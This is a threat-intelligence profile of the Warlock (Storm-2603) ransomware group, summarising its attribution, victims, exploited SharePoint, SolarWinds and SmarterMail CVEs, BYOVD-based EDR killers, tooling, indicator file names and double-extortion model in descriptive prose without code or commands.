Warlock

Warlock is a ransomware group active since at least June 2025. It is also referred to in the provided reporting as WarLock, Warlock Group, Water Manaul, Storm-2603, and in one Sophos-linked context as Gold Salem. Multiple sources in the content describe the group as attributed to Chinese threat actors, with reporting specifically stating that Warlock Group (aka Storm-2603) is a ransomware gang attributed to Chinese actors and that ReliaQuest linked related activity to Storm-2603 with moderate-to-high confidence. The group has been reported posting victims from June 2025 and reached 43 total listings in Q3 2025; other reporting says it hit more than 60 organizations in six months. Victim sectors directly mentioned in the content include nuclear energy, aerospace, government, telecommunications, and organizations using SmarterMail/SmarterTrack. Named victims or claimed victims in the content include Talal Abu-Ghazaleh Global, Hitachi, Primrose Oil Company, Colt Technology Service Group, Cleary Building Corporation, and SmarterTools-related environments. Warlock is described as a closed ransomware group that does not rely on affiliates and develops proprietary EDR killers from scratch. ESET reporting in the content says Warlock deploys dozens of EDR killers per intrusion until one works, and multiple samples showed patterns consistent with AI-assisted code generation. ESET also strongly suspects Warlock uses artificial intelligence to help write and update its EDR killer code. Tactics and techniques directly described in the content include exploitation of unpatched Microsoft SharePoint servers, including reporting tied to CVE-2025-53770 and references to CVE-2025-49704, CVE-2025-49706, and CVE-2025-53771; exploitation of SolarWinds Web Help Desk vulnerabilities for initial access, including activity associated with CVE-2025-26399; and exploitation of SmarterMail vulnerabilities, including CVE-2026-23760 and CVE-2026-24423. The group is also described as using chains of zero-day vulnerabilities in some intrusions. For defense evasion, Warlock has used BYOVD techniques and signed Chinese drivers to disable antivirus or security products. Reporting in the content says the group used googleApiUtil64.sys previously and later NSecKrnl.sys to terminate security products at kernel level. The group is also described as neutralizing antivirus protections and repeatedly attempting multiple EDR killers during an intrusion. Operational tooling directly mentioned includes TightVNC for persistence, PsExec for lateral movement, RDP Patcher for concurrent RDP sessions, Velociraptor for command-and-control or post-compromise activity, Visual Studio Code with Cloudflare Tunnel for tunneling C2 traffic, Yuze for intranet penetration and reverse proxy connectivity, Rclone for exfiltration to S3 buckets, SimpleHelp, vulnerable WinRAR versions, and web shells and files such as spinstall0.aspx, spinstall.aspx, spinstall1.aspx, spinstall2.aspx, IIS_Server_dll.dll, SharpHostInfo.x64.exe, xd.exe, and debug_dev.js. The group uses double extortion. The provided extortion note states that Warlock Group encrypts victim data, exfiltrates data, threatens public release or sale of stolen information, and offers decryption and deletion of stolen data in exchange for payment.